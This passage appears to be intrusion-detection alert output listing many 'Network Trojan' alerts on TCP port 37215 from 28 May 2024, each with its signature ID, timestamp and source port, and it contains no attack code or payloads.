          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437760
          SID:2829579
          Source Port:44212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528916
          SID:2835222
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665597
          SID:2829579
          Source Port:60608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173143
          SID:2835222
          Source Port:41498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136797
          SID:2829579
          Source Port:44952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840224
          SID:2829579
          Source Port:55248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591832
          SID:2829579
          Source Port:60202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592782
          SID:2829579
          Source Port:48356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590762
          SID:2829579
          Source Port:60670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992359
          SID:2835222
          Source Port:42336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603940
          SID:2835222
          Source Port:60802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068579
          SID:2835222
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763732
          SID:2829579
          Source Port:52226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221451
          SID:2829579
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299663
          SID:2829579
          Source Port:44016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.116438
          SID:2835222
          Source Port:52634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848558
          SID:2835222
          Source Port:34394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613631
          SID:2835222
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806656
          SID:2835222
          Source Port:35238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728907
          SID:2829579
          Source Port:34952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285240
          SID:2835222
          Source Port:53220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223156
          SID:2835222
          Source Port:43312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708351
          SID:2835222
          Source Port:48598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272775
          SID:2835222
          Source Port:38622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914212
          SID:2829579
          Source Port:47132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958452
          SID:2829579
          Source Port:40080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797911
          SID:2835222
          Source Port:54442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142064
          SID:2829579
          Source Port:57158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597185
          SID:2835222
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879424
          SID:2835222
          Source Port:37154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850732
          SID:2835222
          Source Port:54178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.535907
          SID:2829579
          Source Port:46910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652891
          SID:2835222
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403135
          SID:2835222
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842223
          SID:2835222
          Source Port:37416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154185
          SID:2829579
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000772
          SID:2829579
          Source Port:35324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269177
          SID:2835222
          Source Port:54088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297700
          SID:2835222
          Source Port:47144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626716
          SID:2835222
          Source Port:59974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841959
          SID:2829579
          Source Port:37498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535137
          SID:2835222
          Source Port:47792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336090
          SID:2829579
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414798
          SID:2835222
          Source Port:38044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466284
          SID:2829579
          Source Port:60166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204838
          SID:2829579
          Source Port:44714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711482
          SID:2835222
          Source Port:45584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491343
          SID:2829579
          Source Port:35986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818068
          SID:2835222
          Source Port:39162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729352
          SID:2835222
          Source Port:56702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839723
          SID:2835222
          Source Port:36720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.113006
          SID:2835222
          Source Port:54464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480466
          SID:2829579
          Source Port:34360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188961
          SID:2835222
          Source Port:49032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772730
          SID:2835222
          Source Port:38430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339516
          SID:2829579
          Source Port:60038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809862
          SID:2835222
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536697
          SID:2829579
          Source Port:54428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668229
          SID:2829579
          Source Port:48822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322212
          SID:2835222
          Source Port:34004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103036
          SID:2835222
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276309
          SID:2835222
          Source Port:48106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178059
          SID:2835222
          Source Port:40628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156224
          SID:2829579
          Source Port:50726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681791
          SID:2835222
          Source Port:53632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328558
          SID:2835222
          Source Port:37386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807479
          SID:2829579
          Source Port:44712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989084
          SID:2829579
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734773
          SID:2829579
          Source Port:42602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224265
          SID:2829579
          Source Port:45042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542351
          SID:2829579
          Source Port:43692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774855
          SID:2829579
          Source Port:42854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336479
          SID:2829579
          Source Port:60642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115502
          SID:2835222
          Source Port:46376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711337
          SID:2829579
          Source Port:59004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549351
          SID:2835222
          Source Port:54038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722515
          SID:2829579
          Source Port:36926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963150
          SID:2829579
          Source Port:34904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474657
          SID:2829579
          Source Port:52676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763605
          SID:2835222
          Source Port:58858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215899
          SID:2829579
          Source Port:53318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291649
          SID:2829579
          Source Port:54512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239408
          SID:2835222
          Source Port:41890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267078
          SID:2829579
          Source Port:33108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598769
          SID:2835222
          Source Port:41090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914228
          SID:2835222
          Source Port:37038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157103
          SID:2835222
          Source Port:60874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656317
          SID:2835222
          Source Port:57644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270827
          SID:2829579
          Source Port:45566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044542
          SID:2829579
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465238
          SID:2829579
          Source Port:58574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709299
          SID:2829579
          Source Port:56042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962431
          SID:2835222
          Source Port:36770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.904033
          SID:2835222
          Source Port:39634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338629
          SID:2829579
          Source Port:51236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225772
          SID:2829579
          Source Port:47424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151871
          SID:2835222
          Source Port:39440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796493
          SID:2829579
          Source Port:51458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960884
          SID:2829579
          Source Port:42056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497260
          SID:2835222
          Source Port:50084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.610277
          SID:2829579
          Source Port:36744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143863
          SID:2829579
          Source Port:40134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795245
          SID:2829579
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850013
          SID:2829579
          Source Port:60120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543073
          SID:2835222
          Source Port:52410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483012
          SID:2829579
          Source Port:58802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201407
          SID:2835222
          Source Port:46750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146363
          SID:2835222
          Source Port:45174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271604
          SID:2829579
          Source Port:43620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485320
          SID:2829579
          Source Port:52512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291778
          SID:2835222
          Source Port:35724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464349
          SID:2829579
          Source Port:36660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605616
          SID:2829579
          Source Port:46758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225787
          SID:2829579
          Source Port:33980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.751765
          SID:2829579
          Source Port:47014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689089
          SID:2829579
          Source Port:36436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977420
          SID:2829579
          Source Port:42416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535479
          SID:2829579
          Source Port:40950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932743
          SID:2835222
          Source Port:48686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322060
          SID:2829579
          Source Port:58182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136044
          SID:2829579
          Source Port:46076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290214
          SID:2835222
          Source Port:51748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297453
          SID:2829579
          Source Port:33268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.474886
          SID:2835222
          Source Port:53788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848356
          SID:2835222
          Source Port:48956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923573
          SID:2829579
          Source Port:48266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.308226
          SID:2829579
          Source Port:48176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475937
          SID:2829579
          Source Port:59158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664127
          SID:2835222
          Source Port:50730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667515
          SID:2829579
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711201
          SID:2829579
          Source Port:46744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841431
          SID:2835222
          Source Port:60278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466262
          SID:2829579
          Source Port:43190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465101
          SID:2835222
          Source Port:52096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793280
          SID:2835222
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272276
          SID:2835222
          Source Port:60328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923770
          SID:2829579
          Source Port:59454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921069
          SID:2829579
          Source Port:50494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183061
          SID:2829579
          Source Port:51788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356741
          SID:2829579
          Source Port:58560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144952
          SID:2829579
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800129
          SID:2829579
          Source Port:47364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913772
          SID:2835222
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401339
          SID:2829579
          Source Port:50984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470795
          SID:2835222
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744242
          SID:2829579
          Source Port:56076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147413
          SID:2829579
          Source Port:48434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464060
          SID:2835222
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301202
          SID:2829579
          Source Port:45384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266530
          SID:2829579
          Source Port:41918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341021
          SID:2829579
          Source Port:56136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295225
          SID:2835222
          Source Port:41874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338642
          SID:2829579
          Source Port:59060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142546
          SID:2835222
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774502
          SID:2829579
          Source Port:33548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227890
          SID:2829579
          Source Port:59356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807931
          SID:2829579
          Source Port:48144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230033
          SID:2835222
          Source Port:54914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977335
          SID:2829579
          Source Port:35536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487258
          SID:2835222
          Source Port:42802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464194
          SID:2829579
          Source Port:40240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755810
          SID:2835222
          Source Port:42618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157551
          SID:2835222
          Source Port:40856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273229
          SID:2835222
          Source Port:45152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216173
          SID:2835222
          Source Port:55280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528867
          SID:2835222
          Source Port:46202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207007
          SID:2829579
          Source Port:53762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222517
          SID:2835222
          Source Port:56260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222182
          SID:2835222
          Source Port:41218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.234777
          SID:2829579
          Source Port:46268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744809
          SID:2835222
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202980
          SID:2835222
          Source Port:50156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295273
          SID:2835222
          Source Port:60064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051287
          SID:2829579
          Source Port:51836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245609
          SID:2829579
          Source Port:43492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019681
          SID:2829579
          Source Port:48540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711482
          SID:2835222
          Source Port:37280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269663
          SID:2835222
          Source Port:56984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662648
          SID:2835222
          Source Port:46934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066029
          SID:2835222
          Source Port:50576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.981901
          SID:2835222
          Source Port:56962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170826
          SID:2829579
          Source Port:44270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144993
          SID:2829579
          Source Port:37468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793293
          SID:2829579
          Source Port:52722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817649
          SID:2835222
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710231
          SID:2835222
          Source Port:52706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877817
          SID:2829579
          Source Port:41386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976551
          SID:2835222
          Source Port:50444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124453
          SID:2835222
          Source Port:51108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141318
          SID:2829579
          Source Port:39514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602061
          SID:2829579
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301211
          SID:2835222
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141746
          SID:2829579
          Source Port:39050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595016
          SID:2835222
          Source Port:35566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337214
          SID:2835222
          Source Port:56742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330189
          SID:2835222
          Source Port:59946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858363
          SID:2829579
          Source Port:53136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
